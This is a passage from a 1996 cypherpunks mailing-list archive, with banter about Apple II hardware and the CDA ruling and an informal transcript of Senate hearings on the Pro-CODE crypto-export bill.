On Thu, 13 Jun 1996, Timothy C. May wrote:

> >BTW, Intel shares a substantial proportion of the blame for Apple's choice
> >of the 6502.  The decision was made, I've heard, because Intel was still
> >trying to get $200 for a slow 8080, while Western Design Center (?) wanted
> >only about $20 for a 6502.
> 
> You need to check your claims more carefully. There are always many reasons
> a chip is selected for a design.

Well, the machine was originally designed around an 8080, but then Woz 
found the incredible deal on the 6502 and re-worked the machine...

----------
Jon Lasser (410)532-7138                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 14 Jun 1996 17:30:35 +0800
To: cypherpunks@toad.com
Subject: Re: Insults (was: PBS show)
In-Reply-To: <Pine.SUN.3.91.960613110936.2157D-100000@tipper.oit.unc.edu>
Message-ID: <Pine.LNX.3.93.960613213907.140A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jun 1996, Simon Spero wrote:

> On Thu, 13 Jun 1996, Bill Frantz wrote:
> 
> > At 10:26 PM 6/12/96 -0700, Timothy C. May wrote:
> > >I personally despise the term "nerd," but I won't get into that here.
> > >(Except to say that "nerds," "geeks," and "dweebs" are terms of insult, and
> 
> > IMHO the best way to deal with an insult is to make it a badge of pride. 
> 
> Geek Pride! Yes! Time to start Hacked-Up!
> 
> "We're Freaks! We're Geeks! We've got RSA, Get Used To It"
	
	We're freaks, we're geeks, we've got your data and we're not
afraid to use it?

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 15 Jun 1996 11:27:20 +0800
To: Blake Wehlage <cypherpunks@toad.com
Subject: Re: PBS show
Message-ID: <199606140448.VAA01980@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:23 PM 6/13/96 EDT, Blake Wehlage wrote:
>At 09:35 AM 6/13/96 -0800, jim bell wrote:

>>But the Apple II WAS a toy!  Non-detached keyboard, poor placement of reset 
>>key, upper-case only, 40-character wide display, odd microprocessor, VERY 
>>SMALL capacity floppies (which were very slow as well), as well as a hostile 
>>legal situation regarding the building of clones.  Hell, they even objected 
>>to other companies building boards which plugged into the bus!
>
>
>I was not a toy it was what started the PC revolution

Grandly ignoring the Altair, the TRS-80 Model I, the IMSAI, et al.  Even Jolt!


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 14 Jun 1996 17:40:40 +0800
To: norm@netcom.com (Norman Hardy)
Subject: Re: Class III InfoWar: TST Article
In-Reply-To: <ade632bf01021004d335@DialupEudora>
Message-ID: <199606140318.WAA15580@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Norman Hardy wrote:
> 
> A large capacitor can discharge a lot of power in a short time without
> causing nearly so much commotion as an explosion. Discharging a one kg
> 25000 volt capacitor makes a lot of noise, however. I don't know how well
> it can be muffled.

Isolate it with vacuum?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 14 Jun 1996 19:28:58 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: "Neil, the government wouldn't tap the phones of American  Reporters"
Message-ID: <199606140556.WAA05474@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:11 PM 6/11/96 -0700, Bill Stewart wrote:
>"Neil, the government wouldn't tap the phones of American Reporters"
>- Hedrick Smith to his NYT colleague Neil Sheehan, while working
>on the Pentagon Papers project - he was incorrect, and his phones
>_were_ being tapped....
>
>CSPAN-2 is doing a 25-year retrospective on the Pentagon Papers this week;
>Daniel Ellsberg, Hedrick Smith, and others were on tonight,
>with people from other sides on later this week.  Cool show so far!
>

While I didn't pay any appreciable attention to the Pentagon Papers case at 
the time, it is worth noting that the only reason that it "occurred" 
(appeared in the media) was that a few reporters decided it was worth 
opposing the government.  Today, this stuff would just pop up on the 
Internet without the approval or participation of the media:  Obviously, 
this is a vast reduction of the influence of the media, and a corresponding 
increase in the power of the individual.  _THIS_ is the kind of thing that 
the government fears; it has cultivated its relationships with the news 
media for many decades, and doesn't want circumstances to change.

The Watergate incident is yet another one of those things which might not 
have "happened" without media people inclined to do it then, but that is no 
longer the truth today.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moltar Ramone <jlasser@rwd.goucher.edu>
Date: Fri, 14 Jun 1996 17:45:25 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: PBS show
In-Reply-To: <199606131831.LAA29180@mail.pacifier.com>
Message-ID: <Pine.SUN.3.91.960613223218.5810A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jun 1996, jim bell wrote:

> >The comments about the floppies (" VERY SMALL capacity floppies (which were
> >very slow as well") is even more off-base.
> 
> The original Apple II floppy held ONLY 90 kilobytes on a 5" floppy.  How did 
> they do such a bad job?

Wrong.  The _original_ apple 2 floppy held about 130K -- competitive with 
other single-density single-sided floppies of the day... 1 1/2 years later, 
they fit 160K on a single-sided single-density floppy, almost as much as 
an IBM double-density single-sided floppy (180K)  (This is related to the 
fact that the apple used 5+3 encoding, while IBM still uses the 
more-obvious but less-efficient 4+4 -- read _Beneath_Apple_DOS_ for more 
details)

----------
Jon Lasser (410)532-7138                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Fri, 14 Jun 1996 17:41:51 +0800
To: Simon Spero <frantz@netcom.com>
Subject: Re: Insults (was: PBS show)
Message-ID: <m0uUP8C-00035CC@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain



>Geek Pride! Yes! Time to start Hacked-Up!
>
>"We're Freaks! We're Geeks! We've got RSA, Get Used To It"
>
>---
>Cause maybe  (maybe)		      | In my mind I'm going to Carolina
>you're gonna be the one that saves me | - back in Chapel Hill May 16th.
>And after all			      | Email address remains unchanged
>You're my firewall -    	      | ........First in Usenet.........
>
>
Speak for yourself, man!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blake "Pokey" Wehlage Age-13 Gaa- 3.69 (for ice hockey goalie)
<jwilk@iglou.com> My page- http://www.iglou.com/members/jwilk.html
Quote- Does whiskey count as beer? -Homer Simpson          





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Fri, 14 Jun 1996 17:29:02 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Kaos vs Control
Message-ID: <199606140306.XAA22997@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 13 Jun 96 at 10:06, Duncan Frissell wrote:

> At 11:31 AM 6/12/96 -0700, Timothy C. May wrote:
[..]
> >Good to see the courts reaffirming that "chaos" and lack of control by
> >authorities is a core part of the U.S. system. Maybe the control freaks of
> >Europe and Asia who have been charting their own authoritarian courses will
> >give more thought to ensuring liberty even if it causes more "chaos."

> One would hope.  Perhaps reality will have to do it for them.

Reality never did anything for the (Supreme) Court, and certainly not 
a lot of politicians.  But yes, one would hope...

Rob.
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Fri, 14 Jun 1996 19:06:14 +0800
To: jseiger@cdt.org (Jonah Seiger)
Subject: Re: President Clinton's Statement on the CDA Decision
Message-ID: <199606140312.XAA23119@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 13 Jun 96 at 13:57, Jonah Seiger wrote:

>                              THE WHITE HOUSE
[..]
>                          STATEMENT BY THE PRESIDENT
[..]
> I remain convinced, as I was when I signed the bill, that our Constitution
> allows us to help parents by enforcing this Act to prevent children from
> being exposed to objectionable material transmitted though computer
> networks.  I will continue to do everything I can in my Administration to

Really? Where does it say "...except to help parents protect 
children" in the Bill of Rights?

Hm. Maybe he should have inhaled.  Oxygen is good for reading 
comprehension.

My apologies to non-USers on the list.


Rob.

 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Fri, 14 Jun 1996 17:35:22 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: PBS show
Message-ID: <m0uUPTz-00035cC@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:35 AM 6/13/96 -0800, jim bell wrote:
>At 10:26 PM 6/12/96 -0700, Timothy C. May wrote:
>
>>

>But the Apple II WAS a toy!  Non-detached keyboard, poor placement of reset 
>key, upper-case only, 40-character wide display, odd microprocessor, VERY 
>SMALL capacity floppies (which were very slow as well), as well as a hostile 
>legal situation regarding the building of clones.  Hell, they even objected 
>to other companies building boards which plugged into the bus!


I was not a toy it was what started the PC revolution

>I have other, even harsher word for the design of the IBM PC.  Oh yes, the 
>Mac sucks bigtime as well, although primarily for legal reasons.
>

Mac rule they have an awesome GUI (graphical user interface), easy of use it
way up there and they have bitchin' software. 

I know i will regret saying this but:

The mac OS is 3 times better than Windows '95 

(Eat that Bill!)

>Jim Bell
>jimbell@pacifier.com
>
>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blake "Pokey" Wehlage Age-13 Gaa- 3.69 (for ice hockey goalie)
<jwilk@iglou.com> My page- http://www.iglou.com/members/jwilk.html
Quote- Does whiskey count as beer? -Homer Simpson          





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 14 Jun 1996 19:07:59 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: PBS show
In-Reply-To: <ade5b5c2000210044195@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960614001159.4192A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jun 1996, Timothy C. May wrote:

> Given the low cost of the Apple unit, it's a marvel they could do it at
> all. The "IWM" was the key. Just plain good design. And "only 90 KB" is
> also misleading in implying Apple was behind the times. The IBM PC launched
> 3 years later had a built-in cassette port and only offered 180K diskette
> drives (later upgraded to 360K).

Also had more than enough computing power to break knapsack. It's not 
what you've got, it's how you use it.

Interesting gedankenexperiment... how much difference would it have made 
to ULTRA and it's predecessors if bletchley park had rediscovered 
and been able to manfacture semi-reliably primitive transistors? 

Simon



---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Fri, 14 Jun 1996 18:42:06 +0800
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re:
Message-ID: <m0uUQLd-000357C@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:07 PM 6/13/96 -0400, Duncan Frissell wrote:
>"We're sitting here watching the sun rise for the first time and we've never
>even seen the sun"
>
>-- Rush Limbaugh about the Internet on today's show.  Rush also opined that
>it was impossible to regulate.
>
They will never be able to regulate the net, look at he first and main use
for it. 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blake "Pokey" Wehlage Age-13 Gaa- 3.69 (for ice hockey goalie)
<jwilk@iglou.com> My page- http://www.iglou.com/members/jwilk.html
Quote- Does whiskey count as beer? -Homer Simpson          





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 14 Jun 1996 21:36:46 +0800
To: cypherpunks@toad.com
Subject: Semi-Transcript: Pro-CODE hearings on CSPAN-2
Message-ID: <199606140754.AAA25782@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I caught part of the Burns S.1726 Pro-CODE hearings on CSPAN-2 tonight.
Various speakers got about 5 minutes each; most had their full testimony
in the printed record in addition to informal speaking.
Then the Senators got to grill them.  I can't type like Kerouac,
so this will be pretty random and sketchy, almost all mistakes are mine...
(Punctuation, spelling, abbrevs. etc. don't count - sorry :-)
There were several rounds of ~4 panelees I caught the first couple
but it's  ~2am.

Lots of people emphasized "We recognize the legitimate needs of
law enforcement, but other things are more important to national security,
and crypto is Inevitable, inevitable, inevitable, so get used to it."

Senator Burns was showing the NTT RSA chips - he had a bit of trouble
remembering which Triple-DES pieces were 56/168/1024 bits, saying
"I have a good memory but it's short :-)"

Pressler arrived late (he's also busy marking up a tax bill where big
airports want one kind of tax and little ones want another - 
used this as an analogy and ducked out soon.)
He held up a copy of Applied Cryptography "I haven't read it all yet", and
commented that he could ship the book out but not the floppy.
"We've all got to take cracks at reading summaries of books like this."
"The Cold War is over" "This is government trying to catch up,
and government is 10-15 years behind." "We have to protect banking,
and protect the ability of the FBI to protect people."

Jim Barksdale of Netscape talked about how fast his company has grown;
as with other speakers like Bidzos, he talked about how if you miss
a market window, you can't catch up.  His background includes military
intelligence and working for a large cell-phone company, and he had
no problem cooperating with the "legitimate needs of law enforcement"
when they had warrants - but he considers the need for encryption to
be more critical, and considers the cat to be out of the bag.  
He put up a poster with a web page www.thawte.com/products/sioux,
a web server product competing directly with Netscape Server and products
from several other people at the table here today - the product's web page
emphasizes how it's not limited by US export controls.  It's SSLeay based.

Zisman from Lotus and Business Software Alliance talked; I missed most of
it and part of Bidzos's.

Jim Bidzos talked about lots of things, including the NTT chips
(Burns held them up - they're small).  Emphasizes NTT biggest company in 
world.  Cat's out of bag, crypto inevitable.  Flamed escrow.
"Bill Gates called the latest escrow proposal 'No proposal'"
Inevitability of real crypto internationally.

Tim Kraus Kopf of Spyglass talked about how Mosaic is OEMed by many
companies, US and overseas, and about his frustration about not being
able to provide good service to his overseas customers - not only
short-key crypto, but can't provide source.  Decided to see how much
crypto was readily available overseas, did AltaVista search for
Apache-SSL, found it all over the world - PacRim, Germany, Australia,
talked about how SSLeay is Australian-written, contains RSA,RC2/4,DES, etc.,
and is used in products like Sioux that competes with his servers and NS's.

Burns asked Barksdale about whether key escrow extends powers of gov't etc.
Barksdale "We're not against key escrow, just mandatory, but it won't work,
there isn't a compromise, there isn't some clever back door, but it
simply won't work.  If we _could_ make it work, we'd have done it
a while ago so we wouldn't be taking our time today"
"We have some national security interests - well what are they -
we can't tell you - that's like talking to a guy who keeps quoting God -
NRC report last week _had_ seen all the details and said it won't work"

Bidzos - to reinvent the software infrastructure to do key escrow would
take 3-5 years, couldn't really trust third parties to do it.
Imagine Netscape and Microsoft waiting 3-5 years doing this instead
of spending their time competing.  

Pressler? Banks?  Bidzos: In my interest the banks don't understand yet
Kraus Kopf: Double encryption anyway - you'll find a safe in the locked room.
Burns: American Bankers' Assoc endorsed the bill.  Can't a warrant let
them get information without needing escrow and wiretaps?
Bidzos: We've heard aministration say the industry wants escrow -
only if you carefully interpret what that means - companies may do
their own, don't understand what justifies radical change that
brings in third parties and mandatory escrow

Wyden: What do you folks think will happen if we don't modernize?
Zisman@Lotus - will really hold back technology - internet growth speed
absolutely levels playing field between largest players and smallest players
trmendously empowering to small business and what we're doing here
interferes with that.  People used to accept 40 bits, don't any more,
though big customers don't think it's a "joke" like some customers say.
this is a lose-lose proposition.

Wyden: Bidzos - we'll hear the Admin saying foreign products aren't as good,
how will we know foreign products contain what they assert?
Bidzos - it's easy - can download source code & read it, see if it works,
and it _does_ work as well or better.  2) test interoperability,
since you can import it and verify it's identical.  German and Japanese chips
very good, use US patents, high school textbooks, etc.
often overlooked cost - we'll have our lunch eaten here in the US as well,
not just overseas markets - say MNC wants secure comms, buys Japanese.

Wyden: Barksdale - concerned that overall the government has consistently
been fighting yesterday's battle - everybody was against smut but
private sector vs. smut cops, fortunately courts making good decisions
- how to catch up and be pro-active instead of behind
Barksdale - we've given fair amount of thought - dump key escrow,
dump limited key lengths, won't work, last war - it's a given.
Understand crypto only a portion of sigint, other ways start at source
or destination - subpoenas, most people who have a mind to do harm
don't use the internet, they use phones.
So what can we do that _does_ work?  Look for new ways, not restricting
old ways to make things that won't work kinda work, worst approach.

John Kerry D-Mass - My state has emormous stake, and I'm former prosecutor,
trying to come to grips with choices - how do you find out what others
selling - are they living up to level of proficiency they're advertising.
Bidzos: Largest corp in world NTT just did the chips, would deny reality
to say otherwise
KrausKopf - advantage in encryption it's easy to verify because if you can
decrypt it you know it works
Bidzos - some of the foreign implementations don't measure up, and 
don't doubt some US entities can exploit, but problem - process by which
deficiencies are resolved is improving rapidly, testing by import to US,
next step may be for overseas products to be incompatible with US so
if you want good security you need to buy South African instead of US,
you can buy over Internet.  They're not as good as we are, improving
rapidly, larger companies _are_ as good.
Kerry - is this inevitiability curve?
Bidzos - yep.  Intelligence folks are very good but their job
isn't to care about whether we lose market share.
K - if you know what we knew?
Z - NRC did know, 13/16 security cleared.  Market inevitability.
too much Focus on key escrow instead of getting intelligence community
equipped to deal with it.
K - Alternatives if escrow won't work?
Z - Escrow in legal sense vs. this stuff.  Impractical, and won't
catch bad guys, unacceptible to market.  Voluntary key recovery
something big companies already do, and warrants can get those from
places that use them.  These discussions going on for a long time,
being brought to a head, need immediate relief and action so we can
have a playing field where we can compete
K - you do accept legitimate needs
Z - sure, but reject idea that current policies affect that
K - so you think it's inevitable that won't work
Z - yeah 
K - do you believe there's potential for cyberterrorism that could
impact either defense comms or financial institutions
Barksdale - sure - that's why we need tight encryption instead of
this loosey-goosey stuff we've got.  Can you imagine pressure on holder
of key escrow for international circumvention to get that file?
KK - security depends on number of doors, not just lock strength.
Bidzos - intelligence worried about increased costs, idiot-proof crypto,
but that's the inevitability we have to accept.  Significant loss of
jobs and revenues if don't act, NSA doesn't understand market forces,
        "other than that they're doing fine" :-)
and risk backlash that could completely lose them any controls,
if we were to raise speed limit to 100 mph, you'd see us investing in
faster police cars
        Burns - in Montana we don't have speed limit :-)
Burns - are y'all saying this policy puts us at more risk than without it
Everybody - yes, we've been saying this for long time,
national security is much stronger with crypto protecting
the computers we're dependent on.

Bidzos?  We get asked what if terrorist brings down airliner?
Well, in this computer age, what if a 12-year-old does?
We need crypto to prevent that sort of problem.

Kerry - market share, clearly understand, trying to balance interests

Wyden - are you discussing software with intelligence community?
new partnership on software side like have with hardware
Bidzos - couldn't agree more - NSA thinks talking AT&T & Motorola is
whole industry.  And without prior consultation, all we've gotten has
been Clipper Chip and key escrow

Barksdale - My CTO talking at NSA? conference Friday, happy to talk
Zisman - expertise exists, much better to invest in intelligence-gathering
techniques than implementing diversionary stuff that won't work

Kerry - if you're US attorney and get a wiretap you can't read,
what happens if can't break - are we saying law enforce needs new tools
Barks - yes sir, just like conversation on street hard to tap
K - so we just have to adjust
B - yes sir
Bidzos - 40-bit agreement between NSA and industry waS that 40-bit
level would be periodically raised - we might not be having this
confrontation if NSA'd done their part and taken us seriously

Kenneth Dam of NRC Panel next on agenda - also brought with him
Jules Katz former deputy USTR, 30 years export control,
Herb Lin, staff director, has whole report
        still in printing but we can get you copies now.  volume August.
        executive summary and full statement available
Keeping confidential info private is very hard.
Criminals, corporate spies, crucial systems vulnerable to all sorts of
people.  Crypto an important, vital tool for protecting citizens privacy
and legitimate business interests.  Bad Guys can also use it.
Feds must weigh issues.  NRC study asked for by Congress.
We have diverse interests, but have strong consensus,
13/16 got cleared for classified materials, unanimously conclude
that debate can be carried out reasonably on unclassified basis.
Wider use of crypto will support everyone's interest even though
will make it harder for law enforcement.  

Don't believe total drop export controls, though relaxing will help. 
DOmestic/Foreign version split bad at home - govt needs to make it
easier for US companies. Should be easy to export DES.  
US world market leadership good for national security.  
No legal limits domestically!

"National security vs. business security" is over-simplistic -
protecting civilian infrastructure stengthens national security.

Escrow promising but unproven, risky - resolving some issues
would require legislation, but there's not enough experience to
base it on anything but speculation - government should pursue
for internal use, developing policy with open public discussion.
Only way to get consensus is Congressional discussion.

Burns - we politicians will take the parts we like and throw
the rest away :-)  Why are National Security folks unwilling
or reluctant to try other approaches?

Dam - Law Enf vs. National Security - N.S. folks recognize responsibility
to protect whole country's security, including infrastructure,
so they're more balanced.  Law Enf has different concerns - they're
interested in surreptitious eavesdropping phone conversations and
data - also want to hold down crime, and computers are growing part of that,
LE under pressure to solve big high-profile crimes fast and pre-empt,
like blowing up World Trade Center.  They have other ways to get info,
e.g. subpoena, warrants, but most people don't keep records of phone calls
that can be subpoenaed, and this is the heart of their concern.

Burns - still vulnerable to terrorism because we're open and free,
but jsut as vulnerable to industrial espionage, need real crypto to prevent.
more risk from industrial than terrorists.  Thought report was very
complete on that.  Wyden?

Wyden: report ought to be real wake-up call for Clinton folks in field.
Very prestigious report.  Mr. Dam - you were at State in 80s, part of team
advocating strong controls, why did you change your mind?
Dam - crypto export wasn't big issue then, world changing fast,
industrial vulnerability criticial, info security in INformation Age.

Dam - wants to allow >DES export for products that make plaintext available.

For people to understand the issues, they'll have to get up to speed on
a lot of issues, but they're not classified ones.

Wyden wants Dam to lead discussions between software folks and NSA-side,
hopes some convergence and cooperation can happen.

===========================================================

Next panel - HP, EDS, etc. 
  
Dan Buchanan - Zion's Data Svcs. in Salt Lake - Bank holding business.
Utah digital Signatures laws.  Computer breakins in financial businesses -
we need strong crypto to be able to compete with foreign banks and
preserve our own assets.  Our biggest asset is the trust we represent
to our customers - essential that we not be limited in use of crypto,
flexible methodologies absolutely critical as computer power increases.

EDS - we're now separate from GM, trading NYSE next monday.
We're world-wide, chasing global electronic commerce markets,
need secure, speedy, efficient communications,
restrictions reduce our competitiveness.
Pleasant calm pro-crypto speech.  Good for Industry, Good for America!

HP - Richard Sevick.
HP speaker showing off his smart card, says 500 million around world,
need stronger crypto than export allows, international competitors.
HP projects 4 billion smart cards in use by Y2000, US companies can't
afford to miss it, need this export liberalization.  It's also an
international problem, not just national - HP working with US and G7
to get international framework for crypto, needs legislative support
from S.1726 - Proposes Crypto engines on servers which don't work
without smartcard "flag chips" to let you use your government-approved
crypto chip to authorize different levels of encryption as needed.
        [WCS comment - yukkk!  I'm trying to be objective, but.....]
Can do shopping at home with security!  Companies can interchange sensitive
info, level of crypto flexible as authorized by national governments.
Pilots this fall with computer vendors, banks, phone companies, expect
approval, want S.1726 to help them export its framework.

Burns - if we're going to live in a micro-chip and supercomputer industry,
why should we hang on to the old vaccuum tube? 
Seen proposals for smart cards for foodstamps/welfare/wic/etc. fraud
prevention because foodstamps are sold on street.

Joel Lisker from MasterCard - MC uses crypto for PINs,
smartcards - 40-bit key way too short, computer hackers can crack in seconds,
can't export strong enough smartcards without long slow negotiations.
Held up Spanish chip-card from Europay, their counterpart in Spain -
if we gave this kind of card to US customer, not clear they could
take it with them in their wallet on trip out of US because export laws.

Burns - are your customers reluctant to do business on phone,
divulging account numbers etc. -

Lisker - younger people usually more comfortable but older
customers more concerned about compromise.

Sevcik - people trust smartcards more with PINs since they can't
be used if stolen.

Burns - some trials of smartcards for foodstamps annoyed bureaucrats
because it doesn't take as many people at the courthouse counting
food stamps.

====================================
aharon friedman digital secured networks technology
        hardware crypto product company in NJ - 512-bit keys
        minimum length needed is 75 bits to be close to unbreakable.
        40 not enough - can buy $400 chip to break 5 hours, etc.
                $300K break 0.18 seconds
        Security agencies would like us to use 56 bits,
                same $300K of off-the-shelf stuff 19 days to break,
                but same $300K of custom chips can break in 3 hours
                        as described in open literature
                doesn't matter if escrow, can break anyway
        Also need key-exchange, public-key eg. RSA 
                govt doesn't allow itself <1024 bit keys
                we're forced to deliver security products that
                        we don't believe provide security.
                        overseas customers aren't stupid, they won't buy it.
        Job loss estimates
        His company has many requests for their technology,
        thinks it's one of the best, 700 foreign companies request it.
        Large Japanese compnay wants to buy lots.  We can't sell 
                and govt dragging feet even for evaluation copies.  We lose.
        American companies want to communicate with foreign companies -
                what can they buy?  They'll buy NTT or Siemens.
        Showed "Applied Crypto" book source code in back,
                any criminal can type it in or buy a scanner.
        Ex-FBI head says "give me 5 hackers and I can bring down US"
                Easier to write crypto code than make a bomb - 
                law-enforcement agencies know this.
        Quotes NYT editorial - clearly it's time to revise policy.

robert bigony senior-vp marketing govt & space motorola in scottsdale
        Moto at center of debate because of products we make.

=====================================================
..... I'm not going to transcribe the rest....
and the recorded Senator Burns wants to get to lunch :-)


                        Bill


#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 15 Jun 1996 13:43:54 +0800
To: jonathon <grafolog@netcom.com>
Subject: Re: PBS show
Message-ID: <199606140754.AAA09591@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:55 AM 6/14/96 +0000, jonathon wrote:

>> And by refusing to build Masatoshi (?) Shima's design for the Z-80, they 
>
>	The number one selling computer with a Z-80 chip inside was
>	also the number one computer platform which ran CP/M which was
>	The Apple 2e.
>	
>	<< Yes, the Z-870 chip was a third party add on. >>	


Two things:

1.  Eventually, that claim might have been true.  But that's just because 
there were a large number of smaller-volume CP/M computers  such as Altair, 
IMSAI, CROMEMCO, Northstar, Kaypro, Godbout, Morrow, Heath/Zenith,  and 
numerous others, as well as TRS-80' (Models I, II, and II; most of which ran 
TRSDOS instead of CPM) which cumulatively added up to a number vastly larger 
than Apple-II/Z-80 installations.  And I don't want to leave out the "Big 
Board" Z-80 computer, which put everything on a single large PCB, which was 
about a 1980 product.  Or, for that matter, Sinclair's ZX-80 (?)

2.    If anything, the popularity of the Z-80 processor for the Apple 
revealed just how bad the 6502 and associated Apple software was.  People 
don't generally change (add-in) microprocessors if they're satisfied with 
the underlying computer and available software.  In fact, it's even worse, 
because the one advantage of the Apple was its color display, while none of 
the CP/M software being run on the Z-80 card in the Apple knew about color.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Sat, 15 Jun 1996 11:40:32 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: PBS show
Message-ID: <m0uUQvq-000357C@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:47 PM 6/13/96 -0800, jim bell wrote:
>At 11:23 PM 6/13/96 EDT, Blake Wehlage wrote:
>>At 09:35 AM 6/13/96 -0800, jim bell wrote:
>
>>>But the Apple II WAS a toy!  Non-detached keyboard, poor placement of reset 
>>>key, upper-case only, 40-character wide display, odd microprocessor, VERY 
>>>SMALL capacity floppies (which were very slow as well), as well as a hostile 
>>>legal situation regarding the building of clones.  Hell, they even objected 
>>>to other companies building boards which plugged into the bus!
>>
>>
>>I was not a toy it was what started the PC revolution
>
>Grandly ignoring the Altair, the TRS-80 Model I, the IMSAI, et al.  Even Jolt!
>
>
>Jim Bell
>jimbell@pacifier.com
>
>
It was the first BIG product, sorry my bad. 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blake "Pokey" Wehlage Age-13 Gaa- 3.69 (for ice hockey goalie)
<jwilk@iglou.com> My page- http://www.iglou.com/members/jwilk.html
Quote- Does whiskey count as beer? -Homer Simpson          





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 14 Jun 1996 18:23:17 +0800
To: jimbell@pacifier.com>
Subject: Re: PBS show
In-Reply-To: <199606131831.LAA29180@mail.pacifier.com>
Message-ID: <IlkDlaO00YUy1ODDgK@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 13-Jun-96 Re: PBS show by jim
bell@pacifier.com 
> The original Apple II floppy held ONLY 90 kilobytes on a 5" floppy.  How did 
> they do such a bad job?

The original Apple II floppy disk drive held 143KB, though you could use
extra tracks if you were ambitious. The drive was a marvel, and was
considerably ahead of its competition. I remember the Commodore 64
drives (1541?) that were just plain slothful.

You could also use the other side of the disk, of course!

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ecafe Mixmaster Remailer <mixmaster@remail.ecafe.org>
Date: Sat, 15 Jun 1996 11:19:18 +0800
To: cypherpunks@toad.com
Subject: Hackerpunks and C2
Message-ID: <199606140215.CAA03053@avignon.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


[ Although this post deals, for concreteness, with a specific mailing list,
